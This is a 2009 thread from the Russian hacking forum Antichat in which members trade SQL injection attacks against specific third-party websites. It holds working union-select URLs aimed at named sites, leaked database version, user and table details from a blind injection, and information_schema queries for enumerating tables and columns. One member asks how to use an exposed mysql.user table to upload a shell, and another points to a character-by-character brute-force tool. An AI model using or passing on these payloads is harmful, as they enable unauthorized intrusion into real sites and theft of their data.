Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.02.2009, 10:32
|
|
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541
Репутация:
214
|
|
http://www.administrator.net.ru/?id=4-1 = http://www.administrator.net.ru/?id=3
соответственно должна быть скуля?
при 7 колонках пустая пага....есть ли тут скуля? и как ее крутить?
http://www.administrator.net.ru/?id=-4+union+select+1,2,3,4,5,6,7--
|
|
|
11.02.2009, 11:00
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2 svesve
http://www.administrator.net.ru/?id=3[sql] blind sql
version : 5.0.37-community
database : administratornet_test
user : netadmin@localhost
есть таблица admin....
Последний раз редактировалось Gorev; 11.02.2009 в 11:27..
|
|
|
|
11.02.2009, 12:50
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540
Репутация:
96
|
|
что за бд?
Подставил кавычку в поиске sql injection и выдало:
Fatal error: Cannot use object of type DB_Error as array in /home/domen/public_html/lus/script_php/send_msg.php on line 234
Что это за БД и где почитать про раскрутку иньекций в ней?
|
|
|
|
11.02.2009, 12:59
|
|
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541
Репутация:
214
|
|
Сообщение от Gorev
2 svesve
http://www.administrator.net.ru/?id=3[sql] blind sql
version : 5.0.37-community
database : administratornet_test
user : netadmin@localhost
есть таблица admin....
как искал таблицы?
понимаю что скриптом...за верный ответ сервера ты что принимал?
|
|
|
|
11.02.2009, 13:08
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Sipt
select+table_name+from+information_schema.tables+l imit+{N1-100},1
select+column_name+from+information_schema.columns +where+table_name=(таблица или sql хекc)+limit+{N1-100},1
|
|
|
|
11.02.2009, 14:24
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
http://ip-st.ru/txt.php?cat=-1%20union%20select%201,2,3,4,user,6,7,8,9%20from%2 0mysql.user--
Вот открыт mysql.user можно ли залить шелл и что нибудь на подобии, объясните пожалуйста, не разу не заливал охота научиться
|
|
|
|
11.02.2009, 14:24
|
|
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541
Репутация:
214
|
|
Сообщение от Gorev
Sipt
select+table_name+from+information_schema.tables+l imit+{N1-100},1
select+column_name+from+information_schema.columns +where+table_name=(таблица или sql хекc)+limit+{N1-100},1
так и не разобрался с лимитом
|
|
|
|
11.02.2009, 14:26
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2 Assembler
http://forum.antichat.ru/thread104591.html
2 Svesve юзай прогу от SQLHACK-a Сипт4 там есть посимвольный брут..там запрос и ставь...
Последний раз редактировалось Gorev; 11.02.2009 в 15:36..
|
|
|
|
11.02.2009, 18:30
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.np-ats.ru/index.jsp?pid=612'+order+by+1--
Неужели никто ничего не нашёл ?
|
|
|
|
11.02.2009, 19:21
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540
Репутация:
96
|
|
Подставил кавычку в поиске sql injection и выдало:
Fatal error: Cannot use object of type DB_Error as array in /home/domen/public_html/lus/script_php/send_msg.php on line 234
Что это за БД и где почитать про раскрутку иньекций в ней?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
